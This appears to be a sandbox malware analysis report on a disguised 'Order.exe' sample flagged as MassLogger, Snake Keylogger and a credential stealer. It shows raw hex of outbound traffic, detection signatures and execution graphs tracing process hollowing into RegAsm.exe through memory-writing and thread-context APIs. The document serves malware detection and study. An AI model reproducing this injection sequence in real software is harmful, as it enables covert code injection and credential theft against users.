                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:28 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:27 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:05:37:52
                                                                            Start date:09/01/2025
                                                                            Path:C:\Users\user\Desktop\JB#40044 Order.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\JB#40044 Order.exe"
                                                                            Imagebase:0x440000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:ECAA670AAA2B739B6891FD57DEB79731
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:05:37:52
                                                                            Start date:09/01/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                            Imagebase:0xf30000
                                                                            File size:65'440 bytes
                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:43.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:128
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 1197 2651ac1 1198 2651b18 ReadProcessMemory 1197->1198 1199 2651b8e 1198->1199 1200 26523c1 1201 265240d ResumeThread 1200->1201 1202 2652457 1201->1202 1038 2650a20 1039 2650a44 1038->1039 1040 2650af6 1039->1040 1043 2650e59 1039->1043 1063 26510e8 1039->1063 1044 2650e95 1043->1044 1050 26510e3 1044->1050 1083 2651220 1044->1083 1087 2651210 1044->1087 1046 2650f7e 1099 2651a49 1046->1099 1103 2651a58 1046->1103 1047 2650fc2 1107 2651bf8 1047->1107 1111 2651be9 1047->1111 1048 26510a4 1115 2651dd8 1048->1115 1121 2651dc8 1048->1121 1049 26510bc 1127 2652188 1049->1127 1135 2652198 1049->1135 1050->1040 1064 2650ee2 1063->1064 1070 26510e3 1064->1070 1081 2651220 CreateProcessA 1064->1081 1082 2651210 CreateProcessA 1064->1082 1065 2650ef4 1077 2651808 Wow64SetThreadContext 1065->1077 1078 26517f8 Wow64SetThreadContext 1065->1078 1066 2650f7e 1073 2651a49 ReadProcessMemory 1066->1073 1074 2651a58 ReadProcessMemory 1066->1074 1067 2650fc2 1075 2651be9 VirtualAllocEx 1067->1075 1076 2651bf8 VirtualAllocEx 1067->1076 1068 26510a4 1071 2651dc8 WriteProcessMemory 1068->1071 1072 2651dd8 WriteProcessMemory 1068->1072 1069 26510bc 1079 2652188 3 API calls 1069->1079 1080 2652198 3 API calls 1069->1080 1070->1040 1071->1069 1072->1069 1073->1067 1074->1067 1075->1068 1076->1068 1077->1066 1078->1066 1079->1070 1080->1070 1081->1065 1082->1065 1084 2651244 1083->1084 1143 26505bc 1084->1143 1088 2651215 1087->1088 1089 26505bc CreateProcessA 1088->1089 1090 2650ef4 1089->1090 1091 26517f8 1090->1091 1095 2651808 1090->1095 1092 2651824 1091->1092 1094 26518a0 1092->1094 1147 26505d4 1092->1147 1094->1046 1096 2651824 1095->1096 1097 26505d4 Wow64SetThreadContext 1096->1097 1098 26518a0 1096->1098 1097->1098 1098->1046 1100 2651a75 1099->1100 1151 26505fc 1100->1151 1104 2651a75 1103->1104 1105 26505fc ReadProcessMemory 1104->1105 1106 2651a9b 1105->1106 1106->1047 1108 2651c15 1107->1108 1155 2650614 1108->1155 1112 2651c15 1111->1112 1113 2650614 VirtualAllocEx 1112->1113 1114 2651c5d 1113->1114 1114->1048 1120 2651dff 1115->1120 1116 2651fa0 1117 265062c WriteProcessMemory 1116->1117 1118 2651fd8 1117->1118 1118->1049 1120->1116 1159 265062c 1120->1159 1126 2651dff 1121->1126 1122 2651fa0 1123 265062c WriteProcessMemory 1122->1123 1124 2651fd8 1123->1124 1124->1049 1125 265062c WriteProcessMemory 1125->1126 1126->1122 1126->1125 1128 26521bf 1127->1128 1129 265062c WriteProcessMemory 1128->1129 1130 265222b 1129->1130 1133 26522d7 1130->1133 1163 2650644 1130->1163 1167 265065c 1133->1167 1136 26521bf 1135->1136 1137 265062c WriteProcessMemory 1136->1137 1138 265222b 1137->1138 1139 2650644 Wow64SetThreadContext 1138->1139 1141 26522d7 1138->1141 1139->1141 1140 265065c ResumeThread 1142 2652360 1140->1142 1141->1140 1142->1050 1144 2651328 CreateProcessA 1143->1144 1146 2651660 1144->1146 1148 2651938 Wow64SetThreadContext 1147->1148 1150 26519fb 1148->1150 1150->1094 1152 2651ac8 ReadProcessMemory 1151->1152 1154 2651a9b 1152->1154 1154->1047 1156 2651cb8 VirtualAllocEx 1155->1156 1158 2651c5d 1156->1158 1158->1048 1160 2652040 WriteProcessMemory 1159->1160 1162 2652127 1160->1162 1162->1120 1164 2651938 Wow64SetThreadContext 1163->1164 1166 26519fb 1164->1166 1166->1133 1168 26523c8 ResumeThread 1167->1168 1170 2652360 1168->1170 1170->1050 1175 2651930 1176 2651985 Wow64SetThreadContext 1175->1176 1178 26519fb 1176->1178 1188 2650a10 1190 2650a44 1188->1190 1189 2650af6 1190->1189 1191 2650e59 7 API calls 1190->1191 1192 26510e8 7 API calls 1190->1192 1191->1189 1192->1189 1203 26505b0 1204 26505b5 CreateProcessA 1203->1204 1206 2651660 1204->1206 1207 2651cb0 1208 2651d00 VirtualAllocEx 1207->1208 1209 2651d76 1208->1209 1183 2650538 1185 265053d 1183->1185 1184 265055e 1185->1184 1186 26515d6 CreateProcessA 1185->1186 1187 2651660 1186->1187 1171 265056b 1172 265056e WriteProcessMemory 1171->1172 1174 2652127 1172->1174

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 2650538-265055c 4 26505bc-26513cb 0->4 5 265055e-2650569 0->5 8 265142d-2651458 4->8 9 26513cd-26513fd 4->9 12 26514ba-2651513 8->12 13 265145a-265148a 8->13 9->8 16 26513ff-2651404 9->16 20 2651515-2651542 12->20 21 2651572-265165e CreateProcessA 12->21 13->12 26 265148c-2651491 13->26 18 2651427-265142a 16->18 19 2651406-2651410 16->19 18->8 23 2651414-2651423 19->23 24 2651412 19->24 20->21 35 2651544-2651549 20->35 44 2651667-2651741 21->44 45 2651660-2651666 21->45 23->23 27 2651425 23->27 24->23 29 26514b4-26514b7 26->29 30 2651493-265149d 26->30 27->18 29->12 32 26514a1-26514b0 30->32 33 265149f 30->33 32->32 36 26514b2 32->36 33->32 37 265156c-265156f 35->37 38 265154b-2651555 35->38 36->29 37->21 40 2651557 38->40 41 2651559-2651568 38->41 40->41 41->41 43 265156a 41->43 43->37 56 2651751-2651755 44->56 57 2651743-2651747 44->57 45->44 59 2651765-2651769 56->59 60 2651757-265175b 56->60 57->56 58 2651749 57->58 58->56 62 2651779-265177d 59->62 63 265176b-265176f 59->63 60->59 61 265175d 60->61 61->59 64 26517b3-26517be 62->64 65 265177f-26517a8 62->65 63->62 66 2651771 63->66 70 26517bf 64->70 65->64 66->62 70->70
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 23e1b3439417c1eab1f2b16bc8b6e5df3df14bec568abd16131b3360da3f8aa6
                                                                              • Instruction ID: cfd565d3bf63da84277fa30b595f1cba7261c040d168f802600c385edafad2e7
                                                                              • Opcode Fuzzy Hash: 23e1b3439417c1eab1f2b16bc8b6e5df3df14bec568abd16131b3360da3f8aa6
                                                                              • Instruction Fuzzy Hash: 2FD12870D002698FDB11DFA8C980BEDBBF1FF4A304F1491AAD849A7250DB749A85CF95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 71 26505b0-26513cb 75 265142d-2651458 71->75 76 26513cd-26513fd 71->76 79 26514ba-2651513 75->79 80 265145a-265148a 75->80 76->75 83 26513ff-2651404 76->83 87 2651515-2651542 79->87 88 2651572-265165e CreateProcessA 79->88 80->79 93 265148c-2651491 80->93 85 2651427-265142a 83->85 86 2651406-2651410 83->86 85->75 90 2651414-2651423 86->90 91 2651412 86->91 87->88 102 2651544-2651549 87->102 111 2651667-2651741 88->111 112 2651660-2651666 88->112 90->90 94 2651425 90->94 91->90 96 26514b4-26514b7 93->96 97 2651493-265149d 93->97 94->85 96->79 99 26514a1-26514b0 97->99 100 265149f 97->100 99->99 103 26514b2 99->103 100->99 104 265156c-265156f 102->104 105 265154b-2651555 102->105 103->96 104->88 107 2651557 105->107 108 2651559-2651568 105->108 107->108 108->108 110 265156a 108->110 110->104 123 2651751-2651755 111->123 124 2651743-2651747 111->124 112->111 126 2651765-2651769 123->126 127 2651757-265175b 123->127 124->123 125 2651749 124->125 125->123 129 2651779-265177d 126->129 130 265176b-265176f 126->130 127->126 128 265175d 127->128 128->126 131 26517b3-26517be 129->131 132 265177f-26517a8 129->132 130->129 133 2651771 130->133 137 26517bf 131->137 132->131 133->129 137->137
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,037E3584,037E3588,026512BE,?,?,?,?,?), ref: 0265164B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: d06bb5de835a62e3347ded4d003a77f46f3ca2ea9fc9db3fc31bcd26c9a74a4b
                                                                              • Instruction ID: 779e6ff8f0d8a272dfff7f6a55d5973cd6a87d267bb380aa076f5c5e80d8d6f2
                                                                              • Opcode Fuzzy Hash: d06bb5de835a62e3347ded4d003a77f46f3ca2ea9fc9db3fc31bcd26c9a74a4b
                                                                              • Instruction Fuzzy Hash: D6D11770D002698FDB20CFA8C881BEDBBF1FF49304F1491A9D959A7250DB749A85CF95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 204 265131d-26513cb 206 265142d-2651458 204->206 207 26513cd-26513fd 204->207 210 26514ba-2651513 206->210 211 265145a-265148a 206->211 207->206 214 26513ff-2651404 207->214 218 2651515-2651542 210->218 219 2651572-265165e CreateProcessA 210->219 211->210 224 265148c-2651491 211->224 216 2651427-265142a 214->216 217 2651406-2651410 214->217 216->206 221 2651414-2651423 217->221 222 2651412 217->222 218->219 233 2651544-2651549 218->233 242 2651667-2651741 219->242 243 2651660-2651666 219->243 221->221 225 2651425 221->225 222->221 227 26514b4-26514b7 224->227 228 2651493-265149d 224->228 225->216 227->210 230 26514a1-26514b0 228->230 231 265149f 228->231 230->230 234 26514b2 230->234 231->230 235 265156c-265156f 233->235 236 265154b-2651555 233->236 234->227 235->219 238 2651557 236->238 239 2651559-2651568 236->239 238->239 239->239 241 265156a 239->241 241->235 254 2651751-2651755 242->254 255 2651743-2651747 242->255 243->242 257 2651765-2651769 254->257 258 2651757-265175b 254->258 255->254 256 2651749 255->256 256->254 260 2651779-265177d 257->260 261 265176b-265176f 257->261 258->257 259 265175d 258->259 259->257 262 26517b3-26517be 260->262 263 265177f-26517a8 260->263 261->260 264 2651771 261->264 268 26517bf 262->268 263->262 264->260 268->268
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,037E3584,037E3588,026512BE,?,?,?,?,?), ref: 0265164B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: c5555c4506bba0fd09e9b3dc0e17e2da398da9f175e2af0ff6911fb1d9a5f0c6
                                                                              • Instruction ID: 367d360e4e78e70ebef400d06fc3d5194388d496261cb5e63d7c7de66a4deefd
                                                                              • Opcode Fuzzy Hash: c5555c4506bba0fd09e9b3dc0e17e2da398da9f175e2af0ff6911fb1d9a5f0c6
                                                                              • Instruction Fuzzy Hash: 17D10670D002698FDB24CFA8C881BEDBBF1BF49304F1491AAD859B7250DB749A85CF95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 138 26505bc-26513cb 141 265142d-2651458 138->141 142 26513cd-26513fd 138->142 145 26514ba-2651513 141->145 146 265145a-265148a 141->146 142->141 149 26513ff-2651404 142->149 153 2651515-2651542 145->153 154 2651572-265165e CreateProcessA 145->154 146->145 159 265148c-2651491 146->159 151 2651427-265142a 149->151 152 2651406-2651410 149->152 151->141 156 2651414-2651423 152->156 157 2651412 152->157 153->154 168 2651544-2651549 153->168 177 2651667-2651741 154->177 178 2651660-2651666 154->178 156->156 160 2651425 156->160 157->156 162 26514b4-26514b7 159->162 163 2651493-265149d 159->163 160->151 162->145 165 26514a1-26514b0 163->165 166 265149f 163->166 165->165 169 26514b2 165->169 166->165 170 265156c-265156f 168->170 171 265154b-2651555 168->171 169->162 170->154 173 2651557 171->173 174 2651559-2651568 171->174 173->174 174->174 176 265156a 174->176 176->170 189 2651751-2651755 177->189 190 2651743-2651747 177->190 178->177 192 2651765-2651769 189->192 193 2651757-265175b 189->193 190->189 191 2651749 190->191 191->189 195 2651779-265177d 192->195 196 265176b-265176f 192->196 193->192 194 265175d 193->194 194->192 197 26517b3-26517be 195->197 198 265177f-26517a8 195->198 196->195 199 2651771 196->199 203 26517bf 197->203 198->197 199->195 203->203
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,037E3584,037E3588,026512BE,?,?,?,?,?), ref: 0265164B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 7a7a19e967a18bbf31c1cb4feacc6e3ff6b61d8b473581079b97ad94025f505c
                                                                              • Instruction ID: 8b1c525c41dba43d1ea901123c79d5d8a8cf80e999dcbd54128b4fb486a5ecfa
                                                                              • Opcode Fuzzy Hash: 7a7a19e967a18bbf31c1cb4feacc6e3ff6b61d8b473581079b97ad94025f505c
                                                                              • Instruction Fuzzy Hash: D5D10670D002298FDB24CFA8C881BEDBBF1FB49304F1491A9D959B7250DB749A85CF95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 269 265056b-265056c 270 26505cc 269->270 271 265056e-265059b 269->271 272 265062c-26520af 270->272 273 26505ce-26505d0 270->273 271->270 278 26520c6-2652125 WriteProcessMemory 272->278 279 26520b1-26520c3 272->279 273->272 280 2652127-265212d 278->280 281 265212e-2652178 278->281 279->278 280->281
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2037a961a02053135f88b4ca272b5cf6b185a67f8fa193ab0b4ed0416cf07bd5
                                                                              • Instruction ID: 12be6a9af05e154a6611aae0a5076ec94c89aca23d3c8dcb11b7a495a57bade0
                                                                              • Opcode Fuzzy Hash: 2037a961a02053135f88b4ca272b5cf6b185a67f8fa193ab0b4ed0416cf07bd5
                                                                              • Instruction Fuzzy Hash: 0751DEB5D053989FCB01CFA9D994AEEBFF0BF0A314F14806AE844BB211D334A945CB54

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 285 265062c-26520af 288 26520c6-2652125 WriteProcessMemory 285->288 289 26520b1-26520c3 285->289 290 2652127-265212d 288->290 291 265212e-2652178 288->291 289->288 290->291
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02652115
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 172c7401417fd6f51474f8f81d489629c7fc51619ecff240d3ec829b314abb5f
                                                                              • Instruction ID: 74393a066413aa6249e02c9bee39cdbc4b6dac835a41bb690e9f33acde4d674e
                                                                              • Opcode Fuzzy Hash: 172c7401417fd6f51474f8f81d489629c7fc51619ecff240d3ec829b314abb5f
                                                                              • Instruction Fuzzy Hash: CD4168B5D002589FCB10CFA9D984AEEFBF1BB49314F24902AE918BB310D375A945CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 295 2652039-26520af 297 26520c6-2652125 WriteProcessMemory 295->297 298 26520b1-26520c3 295->298 299 2652127-265212d 297->299 300 265212e-2652178 297->300 298->297 299->300
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02652115
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 3477fcf14df44384795f84d1f1aaba86601756a7e5a95d64de9980dc735c91a5
                                                                              • Instruction ID: f9269e07e4c0abaf86638b2551ebdcc4ade1167cb4782b73e632158fd6ac53b1
                                                                              • Opcode Fuzzy Hash: 3477fcf14df44384795f84d1f1aaba86601756a7e5a95d64de9980dc735c91a5
                                                                              • Instruction Fuzzy Hash: 374189B5D002589FCB10CFA9D984AEEFBF1BF49314F24902AE918B7210D375A945CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 304 26505fc-2651b8c ReadProcessMemory 307 2651b95-2651bdf 304->307 308 2651b8e-2651b94 304->308 308->307
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(00000004,?,02651A9B,?,?), ref: 02651B7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 29965ce48eb0a8f75fb8469970648a0765fd4574640a177d24c1edb6fc95fe41
                                                                              • Instruction ID: b1b4a683c28aef44207e981c21251a24fd0203db701dca96622e9a0f91a18916
                                                                              • Opcode Fuzzy Hash: 29965ce48eb0a8f75fb8469970648a0765fd4574640a177d24c1edb6fc95fe41
                                                                              • Instruction Fuzzy Hash: E34168B5D052589FCF10CFA9D984AEEFBF1BB19310F14906AE818B7210D375AA45CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 312 2651ac1-2651b8c ReadProcessMemory 314 2651b95-2651bdf 312->314 315 2651b8e-2651b94 312->315 315->314
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(00000004,?,02651A9B,?,?), ref: 02651B7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: fed264c63afdc0303e2869ce038c95fa9e0063c755bc62dcfdeb1ef2bab9ef69
                                                                              • Instruction ID: ff86772fe62fd1543331f56f36f27236ce54581c7b94577b570ca5a68981172c
                                                                              • Opcode Fuzzy Hash: fed264c63afdc0303e2869ce038c95fa9e0063c755bc62dcfdeb1ef2bab9ef69
                                                                              • Instruction Fuzzy Hash: 0B4178B9D052589FCF10CFA9D984AEEFBF1BB09310F14906AE818B7210D375AA45CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 319 2651cb0-2651cf8 320 2651d00-2651d74 VirtualAllocEx 319->320 321 2651d76-2651d7c 320->321 322 2651d7d-2651dbf 320->322 321->322
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02651D64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 88a687e36a838f1ef2e031be73a4c38f436daa925a88395c7a92190553ccedba
                                                                              • Instruction ID: e021b007796b91cff941b5fe92ac8dac547e972037dd4ade5f6cebefe6bdffa2
                                                                              • Opcode Fuzzy Hash: 88a687e36a838f1ef2e031be73a4c38f436daa925a88395c7a92190553ccedba
                                                                              • Instruction Fuzzy Hash: A74187B9D012589FCF10CFA9D984ADEFBB0BB4A310F20902AE818B7350D335A946CF54

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
